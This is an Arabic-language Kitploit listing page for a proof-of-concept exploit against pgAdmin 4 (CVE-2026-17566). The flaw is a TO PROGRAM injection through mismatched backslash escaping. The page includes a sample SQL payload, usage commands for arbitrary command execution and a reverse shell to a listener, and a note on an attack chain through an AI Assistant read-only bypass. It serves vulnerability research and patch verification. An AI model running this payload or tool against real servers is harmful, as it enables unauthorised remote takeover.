Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-17566 — # pgAdmin 4 استيراد/تصدير RCE (CVE-2026-17566) PoC - حقن TO PROGRAM عبر عدم تطابق الهروب بالشرطة المائلة العكسية | Kitploit
أدوات/GitHubGitHub/hackspeak/cve-2026-17566
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبما بعد الاستغلالاختبار الاختراق
GitHubhackspeak/cve-2026-17566

CVE-2026-17566

# pgAdmin 4 استيراد/تصدير RCE (CVE-2026-17566) PoC - حقن TO PROGRAM عبر عدم تطابق الهروب بالشرطة المائلة العكسية

عرض المستودع
11منذ شهر واحدلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-17566 — pgAdmin 4 Import/Export Data RCE PoC

PoC لتنفيذ التعليمات البرمجية عن بُعد في أداة Import/Export Data لـ pgAdmin 4. يستغل التباين في دلالات تهريب الشرطة المائلة العكسية بين مدقق الأقواس _is_query_parens_balanced() وpsql، لحقن \copy ... TO PROGRAM وتنفيذ أوامر عشوائية على الخادم الذي يشغّل pgAdmin.

خلفية سلسلة الهجوم: CVE-2026-17349 (تسريب بيانات اعتماد Workspaces) → CVE-2026-17351 (تجاوز القراءة فقط في AI Assistant) → هذه الثغرة (RCE). جميعها لا تتطلب سوى مستخدم مصادق بصلاحيات منخفضة.

ملخص الثغرة

تُدرج أداة Import/Export Data استعلام SQL الخاص بالمستخدم في قالب Jinja لبناء أمر psql \copy (...). يعامل مدقق توازن الأقواس المكتوب يدويًا دائمًا \' كعلامة اقتباس مُهرَّبة (وهذا صحيح فقط عندما يكون standard_conforming_strings=off)؛ بينما عندما يكون standard_conforming_strings=on (الوضع الافتراضي في PostgreSQL)، ، فتُغلق علامة الاقتباس مباشرة.

يتعامل psql مع الشرطة المائلة العكسية كحرف عادي
root@kitploit:~
-- مثال توضيحي للـ payload
SELECT 'a\') TO PROGRAM 'echo pwned' x'

يظن المدقق أن ) ما زالت داخل السلسلة النصية ← فيمر فحص «التوازن» للأقواس؛ بينما يغلق psql السلسلة عند a\'، وتُنهي ) تغليف \copy (...)، فيصبح TO PROGRAM 'cmd' تعليمةً فعّالة ينفذها popen() الخاص بـ psql.

  • CWE: CWE-78 (حقن أوامر نظام التشغيل) / CWE-115 (تفسير غير صحيح للمدخلات)
  • CVSS: 9.9 (CVSS 3.1) / 9.4 (CVSS 4.0)، تغيّر النطاق، صلاحيات منخفضة + بدون تفاعل
  • المتأثر: pgAdmin 4 < 9.18 (منذ إدخال _is_query_parens_balanced())؛ الإصلاح في commit 1496fabe
  • ذات صلة: CVE-2025-12762 / CVE-2025-13780 (حقن TO PROGRAM في psql، من العائلة نفسها)
  • مكتشف الثغرة: Arpit Jain (arpitjain099)

شروط الاستغلال

  • مستخدم pgAdmin مصادق بصلاحيات منخفضة (يملك صلاحية tools_import_export_data)
  • الوصول إلى خدمة pgAdmin عبر الشبكة
  • الهدف يعمل بإصدار pgAdmin 4 < 9.18 وأداة Import/Export متاحة

الاستخدام

root@kitploit:~
export PGADMIN_PASSWORD='账户密码'

# أمر عشوائي (تُكتب النتيجة في ملف على جانب الخادم لسهولة التحقق)
python3 pgadmin4_rce_poc.py --url https://127.0.0.1:5050 \
    --user lowpriv --command 'id > /tmp/pgadmin_rce_proof'

# شل عكسي
python3 pgadmin4_rce_poc.py --url https://127.0.0.1:5050 \
    --user lowpriv --reverse 10.0.0.1:4555
المعاملالوصف
--urlعنوان pgAdmin الأساسي
--user / --password (أو PGADMIN_PASSWORD)حساب بصلاحيات منخفضة
--commandأمر عشوائي (لا يمكن أن يحتوي على علامة اقتباس مفردة)
--reverse HOST:PORTتوليد شل عكسي bash
--server-idمعرّف الخادم (الافتراضي: أخذ الأول تلقائيًا)
--fileاسم ملف التصدير (يُستخدم لبناء أمر \copy، الافتراضي /tmp/pgadmin_export.csv)
--no-verifyتخطي التحقق من شهادة TLS

سير العمل: تسجيل الدخول (معالجة تلقائية لـ CSRF/الجلسة) → تعداد الخوادم → إرسال طلب is_query_export المُنشأ عبر POST /import_export/job/<sid>.

⚠️ إخلاء المسؤولية

مخصص للاستخدام في البحث الأمني والتحقق من الثغرات والاختبار الدفاعي فقط. كُتب هذا السكريبت استنادًا إلى تحليل تقني علني ولم يُختبر على جهاز حقيقي، وقد تحتاج حقول الطلبات إلى تعديل طفيف حسب إصدار pgAdmin المستهدف. شغّله في بيئة اختبار مصرّح بها فقط، ولا تستخدمه ضد أنظمة غير مصرّح بها.

الإسناد والمراجع

  • هذا المستودع هو PoC مكتوب بشكل مستقل (MIT License)، ويستند تقنيًا إلى مصادر علنية
  • Issue #10213 الرسمي: خطأ في دلالات الشرطة المائلة العكسية بمدقق الأقواس
  • OpenCVE: CVE-2026-17566
  • NVD: CVE-2026-17566
  • إصلاح commit: 1496fabe
تنزيل الأداة